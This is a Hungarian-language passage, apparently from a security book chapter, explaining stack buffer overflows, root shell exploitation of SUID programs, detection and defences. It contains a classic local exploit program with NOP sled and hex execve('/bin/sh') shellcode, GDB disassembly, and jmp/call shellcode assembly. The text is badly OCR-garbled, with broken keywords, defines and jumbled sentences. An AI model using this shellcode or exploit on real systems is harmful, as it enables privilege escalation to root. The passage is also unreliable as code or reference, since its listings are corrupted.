amelyek már bootoláskor elindulnak.2. végül rátesz még egy lapáttal. de minden felhasználó elindíthatja. amely A-kkal tölti ki a memóriaterületet for(i = 0. amely a tulajdonképpeni hibát okozza void Overflow(char *string) { //A puffer kisebb. A kivitelezéshez szükséges programok (GCC=GNU C Compiler. amit átadtak charTolittle[16] //megpróbálja 256 bájttal teleírni a puffért. i++) { large_string[i] = 'A'. Ez természetesen hibákat eredményez. hogy egy ilyen program biztonsági kockázatot jelenthet. és végül a program hibás működését. természetesen megnő a lehetséges hibaforrások száma. Itt a támadók különösen abban érdekeltek. string). akkor csak annyit kell tennie. hogy egy shellt (parancssort) nyissanak root-jogokkal a rendszeren.különben nem fog menni. Ezzel át lehet venni az ellenőrzést a számítógép felett. //egy ciklus. amelyek a roothoz tartoznak. Forráskódokkal mutatjuk meg.adatmennyiség kilóg a pufferből egy olyan területre. } 11. ami root-jogokkal fut. . mint a ToGreat változó. root-jogokat követel meg. például az 1024 alatti portoké vagy eszközöké.2 Hogyan működik? Shell-kód alatt olyan assembler-kódot értünk. az lefagy. Ez főleg a SUID-programoknál érdekes. A biztos eredmény: memóriavédelmi hiba és a program összeomlása. hogy miért kell egyáltalán root-jogokkal futniuk a programoknak. hogy egy Buffer-Overflow segítségével „megörököljenek" egy root-jogokkal rendelkező shellt. úgynevezett kizsákmányoló (exploit) kód van. OverFlow (To Great) } //Most jön a függvény. holott csak 16 bájtra volna lehetőség. a tulajdonképpeni Buffer-Overflow-t. hogy a program a tulajdonos és nem a felhasználó jogaival fut. csak hogy megszerezzék a nekik szükséges helyet. hogyan nem íródnak felül válogatás nélküli tetszőleges programrészek. Egy példa az ilyen kódra: voidman( ) { //a ToGreat változót 256 bájttal inicializálja char ToGreat[256] //ciklusváltozó int i. hogy addig ír a pufferba. hanem más változókhoz tartozik. i < 255. hogy ez fusson a főprogram helyett. mint a raw sockets vagy bizonyos rendszererőforrások elérése. Ha minden felhasználó root-jogokkal tud programokat futtatni. A továbbiak megértéséhez alapos assembler. ami azt jelenti.2. //ezért az utána elhelyezkedő terület felülíródik strcpy(ToLittle. amit ott találnak. és egy hosszú karakterláncot küld egy meghatározott programnak. amikor a program egy eljárásból vagy függvényből visszatér. s hogyan lehet célzottan megváltoztatni a függvény visszatérési pontjának a címét. Azonban bizonyos bevitelekkel még végre lehet hajtatni egy kódot az instabil rendszeren. Ha a támadó kapcsolatot épít fel a hosttal. és . amíg az megtelik. hogy egy shellt hozzon létre.1 Hogyan lehet ezt kihasználni? Ha a támadó Buffer-Overflow-val akar lefagyasztani egy programot. amely már nem ehhez a pufferhez. 11. A ping egy jó példa az olyan programra. Eközben az adatok mindent felülírnak. Ez egy SUID bitet helyez el. hiszen rootként futó eljárások csak olyanok lehetnek. Világos. amelyek arra valók. Talán felmerül a kérdés. Ennek a következő a háttere: egyes funkciók. amely arra kényszeríti a programot. A shell-kód értelme és célja. GDB=GNU Debugger) futtatásához még Linux is kell. Sok.és Shellscript-ismeretekre van szükség .

A „ptr" megfelel a „bufF"-nak addr_ptr = (long *) ptr. exit(0). hogy növeljék a találat esélyeit. } A „get_sp" változó feltöltése assembler-kóddal} mid main(int argc. } Olyan fogalmakkal lehet dolgozni. cbar shettcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\ x40\xcd" "\x80\xe8\xdc\xff\xff\xff\bin/sh". mert az addr-ptr címét minden cikluslefutással növeljük. ptr = buff. if (argc > 2) offset = atoi(argv[2]). i < strlen(shellcode).(strlen(shellcode)/2)). A változókhoz értéket rendel if (argc > 1) bsize = atoi(argv[1]). i < bsize. for (i = 0. Fontos még megemlíteni. \n"). ."EGG=". hogy a NOP-kód csak a Ox90-es Intel CPU-kon fut. olvashatóbbá váljon. Kiírja a „Using address: 0x%x\n" -t és az „addr" értékét. bsize=DEFAULT_BUFFER_SIZE. Beírjuk a shellkódokat a memóriába.4).1000 NOP kód. putenv(buff). A NOP-kódokat a pufferméret feléig írjuk a memóriába. Ezért nagyon pontosan meg kell becsülni. ptr = buff+ ((bsize/2) . *ptr. long *addr:ptr. system("/bin/bash "). a Shellcode csak a „bin/sh". hogy kevesebb számot használunk. mint a „DEFAULT_OFFSET". } memcpy(buff. Természetesen a támadók több NOP-kódot is beépítenek. azáltal. a pointer minden alkalommal egy bájttal tovább mutat. a többi assembler. int offset=DEFAULT_OFFSET. unsigned long get_sp(void) { asm("movl%esp. hogy a kód. Pointer a ptr címére for (i = 0. int i. addr. buff[bsize -1]= '\0'. dhar *argv[ ]) { char *buff. Most elhelyezzük az endbyte-ot.Magyarázatképpen egy forráskód: exploit3. Egy valódi exploitnál ez többnyire több mint 100 . i++) buff[i] = NOP. for(i = 0. Az „Offset" értéke 0 0 512 0x90 printf("Using address: 0x%x\n". if (!(buff=malloc(bsize))) { printf("Can't allocate memory. hogy eltaláljuk a megfelelőt.offset. i+=4) *(addr_ptr++) = addr. mert még nem ismerjük a shellkód helyét a memóriában. i++) *(ptr++) = shellcode[i].%eax").c #include #define DEFAULT_OFFSET #DEFAULT_BUFFER_SIZE #defineNOP addr = get_sp( ) . A Shellcode változóhoz egy értéket rendelünk. addr). Pointer az „addr-ptr" helyére. Ez a kód még nincs kész. i < bsize/2.

%esp Ez volt az eljárás kezdete.%esp 0x8000136: movl $0x80027b8. hogyan néz ki a forráskód assemblerben. először a „main"-t analizáljuk: 0x8000130: 0x8000131: 0x8000133: pushl movl subl %ebp %esp.%eax 0x8000149: pushl %eax 0x800014a: movl 0xfffffff8(%ebp).%edx 0x80002d2 <__execve+22>: movl %edx.c Most elindítjuk a GDB-t: gdb shellcode A GDB ingyenes szoftver.%ebp 0x8000133: subl $0x8. execve(name[0]. A régi frame-pointert mentjük.%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <_execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x80001a34<__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx.%esp 0x8000158: popl %ebp 0x8000159: ret End of assembler dump.0xfffffff(%ebp) 0x800013d: movl $0x0.%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp.11. és egy új frame-pointert állítunk elő.%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax. } Hogy megnézzük.2. elindítjuk.%esp 0x8000156: movl %ebp. amely szabad helyet készít a helyi változóknak. NLL). name[1] = NULL.%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp).c #include void main( ) { char *name[2]. name. A parancs így néz ki: gcc -o shellcode -ggdb -static shellcode. Ebben az esetben: . %ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb.%ebp $0x8. Ehhez először a GCC-vel kell compilerelni a programot. és GDB-vel elemezzük. name[0] = "/bin/sh".%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp).%eax 0x800014d: pushl %eax 0x800014e: call 0x8002bc <__execve> 0x8000153: addl $0xc.%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp). %esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+l>: movl %esp. Hogy ezt megértsük.3 Minek kell a Shellcode változónál állnia? Most már mindenképpen segítségül kell hívni egy GDB-t! shellcode. és másolatot is lehet róla készíteni! (gdb) disassemble main Dump of assembler code for function main: 0x8000130: pushl %ebp 0x8000131: movl %esp.0xfffffffc(%ebp) 0x8000144: pushl $0x0 0x8000146 leal 0xfffffff8(%ebp).(%eax) 0x80002e1 <__execve+37>: movl $0xfffffffc.

%eax Betöltjük a name[ ] címét az EAX regiszterbe. 11 az execve. 0x80002bc <__execve>: 0x80002bd <__execve+1>: movl 0x80002bf <__execve+3>: pushl %ebp %esp. Minden folyamat az operációs rendszertől függ. 0x8000149: 0x800014a: 0x800014d: 0x800014e: pushl call pushl %eax 0xfffffff8(%ebp). Ez az index a syscall-táblában. A Null pointer címét az EDX-be másoljuk. Tulajdonképpen ez minden az execve( ) meghívásáról.char *name[2].0xfffffff(%ebp) 0x80002c0 <__execve+4>: movl 0x80002c5 <__execve+9>: movl 0x80002c8 <__execve+12>: movl 0x80002cb <__execve+15>: movl 0x80002ce <__execve+18>: int $0xb. Az execve( ) meghívása itt kezdődik.. Az execve( ) library eljárás meghívása. } gcc -o exit -static exit. A támadó egy ilyen programot természetesen megpróbál tisztán programozni.%eax Beírjuk a name[ ] címét a stackbe.0xfffffffc(%ebp) A 0x0 (NULL) értéket a második pointer of name[ ] -be másoljuk. 0x8000146: leal 0xfffffff8(%ebp). Ez ugyanazt jelenti mint: name[0]="/bin/sh". 0x8000144: pushl $0x0 Az execve( ) argumentumait fordított sorrendben helyezzük (push) a stackbe.%ebx 0xc(%ebp). 0x800013d: movl $0x0.c gdb exit (no debugging symbols found). movl Betöltjük a "/bin/sh" sztring címét az EAX regiszterbe.%ecx 0x10(%ebp).c #include void main( ) { exit(0). hogy hozzáfűz egy exit syscall-t: exit./bin/sh" címe) bemásoljuk az első pointer of name[ ] -be. 0x8000136: Az eljárás kezdete movl $0x80027b8.. amelyek azután más értékeket tartalmazhatnának. ha félresikerül? A program végeérhetetlenül tovább hozná az értékeket a stackből. (gdb) disassemble_exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp. Kernel módra váltunk. NULL-ával kezdünk. %eax 0x8002bc <__execve> Beírjuk a stackbe a "/bin/sh" sztring címét. Beírja az instruction pointert a stackbe. Ez ugyanazt jelenti mint: name[1] = NULL.%edx $0x80 A 0xb-t a stackbe másoljuk. %ebp pushl %ebx . Ezt úgy tudja elérni.%ebp A 0x80027b8 értéket (a . Most execve( ). A name [ ] címét bemásoljuk az ECX-be. A "/bin/sh" címét bemásoljuk az EBX-be. De mi történik.%eax 0x8(%ebp). Nem valami finom dolog.

%ebx int $0x80 /bin/sh string goes here. ez az exit kód. %edx int $0x80 movl $0x1.nullbyteoffset(%esi) movl $0x0.null_addr movl $0xb. %ebx leal array-offset. %ecx leal null-offiet(%esi). Jump-pal és Call-lal olyan parancsokat lehet használni. A legtöbb program 0-t ad vissza.null-offset(%esi) movl $0xb. Összefűzve ez a következőképpen néz ki: Elhelyezzük a sztringet a kód mögött.%eax movl 0x8(%ebp). %ebx int $0x80 call offset-to-popl /bin/sh string goes here. A J itt a Jump. # 2 bytes # 1 byte 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes .null_byte_addr movl $0x0. Mivel soha nem tudjuk pontosan.%eax movl %esi. és ezután kell végrehajtani az „int 0x80"-at. könnyítésképpen bizonyos parancsokat lehet használni. %eax movl $0x0. hogy pontosan hova kerül a memóriában az exploit kódunk. pushl %ebx movl $01. természetesen a sztring címét és az endbyte nullát a tömb mögé tesszük. movl string_addr. a sztringcím lesz visszatérési címként megadva. amelyekkel relatív címeket kapunk.%ebx movl %ebp.string_addr_addr movb $0x0. mikor a hívás lefutott. %ebx leal string_addr.%ebx int $0+80 movl 0xfffffffc(%ebp). %eax movl $0x0. %eax movl string_addr. (%esi). %esp popl %ebp ret nop nop nop szünk. hogy a visszatérési címet bemásoljuk a regiszterbe.0x800034f <_exit+3>: 0x8000350 <_exit+4>: 0x8000355 <_exit+9>: 0x8000358 <_exit+12>: 0x800035a <_exit+14>: 0x800035d <_exit+ll>: 0x800035f <_exit+19>: 0x8000360 <_exit+20>: 0x8000361 <_exit+21>: 0x8000362 <_exit+22>: 0x8000363 <_exit+23>: End of assembler dump. movl %esÍ.array-offset(%esi) # movb $0x0. Ha a „/bin/sh" sztring elé egy Call parancsot teA programkód a módosításokat követően jmp offset-to-call popl %esi .%edx int $0x80 movl $0x1. és a C a Call helyett áll. Most már csak annyit kell tenni. ha nem volt hiba. és a Call parancshoz egy Jump parancsot.%ecx leal null_string. A programfutás a következőképpen néz ki: Az Exit syscall-t a 0xl-re helyezzük az EAX-ben.

Ha ez kész.%edx int $0x80 movl $0x1. közvetlenül a Strcpy-val kerül használatba. és azután teszteljük. hogy túl lehet tölteni a puffért. a sztringcímről tömbre és a sztringcímet nullára számoljuk át. A sztring azonban lehet túl hosszú. amelyhez a vége után is hozzá tudunk írni. Ha olyan programról van szó. és a \0 jóval a puffer vége után is elhelyezkedhet. a gets( ). hogy soha nem statikus puffereket. íme. Ez persze véd a Stack Overflow-któl. ami természetesen egy fatális programozási hiba. %ebx leal 0x8(%esi). ezt kapjuk: jmp 0x26 popl %esi jnovl %esi. Call-ról Popl-ra. Az ilyen funkciókat a forráskódban a legegyszerűbb megkeresni. A könyvtárfüggvények tartalmazta parancsok. Mik azok a Heap-based Overflow-k? Heap-based Overflow-kat sokkal nehezebb előállítani. Ilyenkor többnyire a sztringhosszúságot figyeljük az átadási pontokon. először a compilerrel lefordítjuk. A programozók úgy gondolják. a user interfészen keresztül lehet váratlan bevitelekkel tesztelni a programot. neki elég néhány könyvtárfunkciót használnia. a strcpy( ) és a scanf( ) nem figyelnek arra. ezzel minden veszélytől védve vannak. a sprintf( ). egy ciklus.0xc(%esi) movl $0xb. hanem helyette malloc( ) -ot használnak. ami pl. Hogy ezt elérjük. amely elolvas és a pufferbe ír egyes karaktereket. egy fájlszegmensbe vagy stackbe kell csomagolni. ezért ritkábban is találkozni az előbbiekkel. Ezért a kódot. Ha nincs ilyen lehetőség (nincs meg a forráskód). Hogy kiderüljön. Először azonban a bináris kód hexmegjelenítéséhez kell jutnunk.0x7 (%esi) movl $0x0. és hibákat keresünk. A parancsok egyszerűen egy null-karakterig (\0) olvasnak. hogy mi áll hozzá a rendelkezésünkre. az ismert bizonytalansági faktorokra. %eax movl $0x0. Hozzáértő hackereknek tehát ez egy egészen különleges támadási pont! A gond az. mekkora a rendelkezésre . 11. akkor lehet mindent compilerelni. De van egy probléma! Ez a kód sajátosan változik. s a programozók sem nagyon védik ettől a programjaikat. ami attól függ. amelynek megvan a forráskódja.3 Áldozat a Buffer-Overflow-kért Ezekhez a támadásokhoz tehát egy pufferra van szükség. a vprintf( ).Ha az offseteket Jump-ról Call-ra. Sok operációs rendszer ezt megint csak nem engedi meg. a strcat( ). működik-e a kód.0x8(%esi) movb $0x0. logikus. 11. egy kis példa: void tulcsordul(char argvFG) { char BuffertoLittle [4]. %ebx int $0x80 call 0x2b string \"/bin/sh\" # 2 bytes # l byte # 3 bytes # 4 bytes # l bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes #8 bytes álló puffer.%eax movl %esi. A hiba azonban többnyire nem a programozón múlik. mint a Stack Overflow-kat. hogy egy puffért bevitelekkel megtöltsünk. amelyet futtatunk. Lényegében a dinamikus hozzárendelés sem sokkal biztonságosabb. A másik eljárás arra. és ismét a GDB-t használni.4 Honnan lehet felismerni a Buffer-Overflow-t? Szerencsére sok lehetőség van a Buffer-Overflow-k felismerésére. de nem a Heap-based Overflow-któl. és ezután a transzferkontrollt kell használni. és máris jelentkeznek ezek a problémák.%ecx leal 0xc(%esi). Itt szisztematikusan ellenőrizni kell a paraméter-átadásokat és az egyes funkciókat (a DLL-eket és a library-ket). a kódot egy globális tömbbe helyezzük a fájlszegmensben. Ha egy bevitel ellenőrzés nélkül. Linuxprogramoknál szabadon hozzáférhető. egy null-terminálással megjelölt program végéig. akkor nincs gond.

A SecureLINUX-nál egy patch-re van szükség ehhez. hajtsd végre\n".if (strlen(argv) > 7) { cout« "Rossz: a puffer túl fog csordulni\n". vagyis manuálisan. } 11. a támadó többé nem tud mit kezdeni ezzel a számítógéppel. akkor a Netcattel egyenként lehet ellenőrizni a parancsokat a Buffer-Overflow-ra. } eke { cout « "Bevitel OK. De felhasználóként vagy rendszergazdaként megvan még az a lehetőségünk is. és a következőképpen elindítani: „Név 052698541".5 Milyen védelmi mechanizmusok vannak? Tulajdonképpen csak egy Linux-verzió. vagy váratlan karakterekkel feltölteni. } /* Helyes: ahogy a felső részben. . „PZK" túlfut */ } int main(int argc. /*Rossz: Ha argc[ ] túl nagy. annál nehezebb lesz a támadás. hogy a shellneveket és az /etc/passwd-fájlt megfelelően megváltoztassuk. Így már a hálózat felügyeletével is fel lehet ismerni. strcpy(BuffertoLittel. Honnan ismerünk fel egy Buffer-Overflow-támadást? A Buffer-Overflow-támadásokat nagyon nehéz felfedezni. illetve védhetnek bizonyos mértékig e támadások ellen. és a reakcióra várni. argv). A névadási kényszer miatt ez a variáció szinte mindig sikeres. A Solaris 2. Ezáltal a Solarissal kapott programok. hogy az összedöntí a programot. ha minden program forráskódja megvan." A demonstráláshoz egyszerűen le kellene fordítani ezt a programot. disassemblálni. Itt az átadandó paraméternek olyan a hossza. Ahogy az előbbiekben. A standard kernelt kell megváltoztatni. Ha egy kifelé nyitott hálózati szolgáltatóról van szó. A hacker célja mindig az. tulcsordul(argv[1]). Egy programot lehet pl. a SecureLINUX és a Solaris 2. Megmutatja. ha a felhasználói privilégiumokat nem használják ki túlságosan. ami megakadályozza. amelynél a parancsokat és a szintaxist is meg lehet tudni. és az egész Linuxot kompletten át lehet írni. A felderítés egyik lehetősége lenne a szerver lekapcsolása. honnan jönnek az adatok. ha egyszer már megleptek. Itt nem a forráskód a fontos. és utána végrehajtani vagy */ /* mindjárt biztonságos függvényeket használni */ Természetesen más módszerek is vannak.6+ védenek. strcpy(BuffertoLittle. Ha ez megtörténik.6+ nál a „normál" telepítés után aktiválni lehet egy kapcsolót. hogy a „heap"-ben és a „stack"-ben programok futhassanak (noexec_user_stack. hogyan lehet paraméterekkel és más átadásokkal (ezek más helyeken is történhetnek) szándékosan lefagyasztani programokat. Így a fenti példa szerinti Buffer-Overflow természetesen nem sikerülhet. Ezt indítja el az exploiton keresztül is. hanem egy manuálisan előidézett BufferOverflow demonstrálása. argv). mielőtt a hacker törölhetné a nyomait a logfájlokból. úgy kell ezt */ /* csinálni. hogy egy rootshell-hez jusson egy másik Linux-gépen. Ez akkor segíthet. és részletről részletre átvizsgálni. pl. char *argv[ ]) { cout« "Az átadandó paraméter hossza:" « strlen (argvF1G) « "\n". Különösen. mint azt a programozó várta. és egy speciális compilerrel minden programot újra kell fordítani. itt is szándékosan túl hosszú beviteleket kell csinálni. noexec_user_heap). bevitelekkel tesztelni a Buffer-Overflow lehetőségeket. először ellenőrizni. a „root"-ot lehet egyszerűen így nevezni: „HAHA". nincsenek veszélyben. mert a beírás hosszabb volt. Ezért érvényes a régi szabály: „Minél jobban eltérsz a szabványosított megnevezésektől.

Ezáltal a támadót vissza lehet fordítani az assembler-kód irányába.2 A Buffer-Overflow-k és a tűzfalak Egy tűzfallal természetesen csökkenteni lehet a Buffer-Overfíowtámadások lehetőségét. .5. e-mail gateway. 11.11. pl. ha a szervernek még más feladatokat is el kell látnia.1 Összefüggés a CPU és a Buffer-Overflow között Manapság sok szervert működtetnek a kereskedelemben nem szokásos CPU-kkal. Így a tapasztalatlan támadóknak aligha van esélyük. HTTP-szerver vagy adatbázis szerverként működik. router. Teljes biztonságban azonban sohasem érezhetjük magunkat. Ezek nagy biztonsági kockázatot jelentenek. illetve a belső interfészek megtámadását. proxy. hogy egy készre fordított exploit jelenik meg az interneten. nem fognak bennük kiindulási pontot találni Buffer-Overflow-khoz. A tűzfal megnehezíti a külső.5. Konfliktusok abból adódhatnak. és csökken annak a kockázata. Mivel a tűzfalak szinte mindig viszonylag kicsik.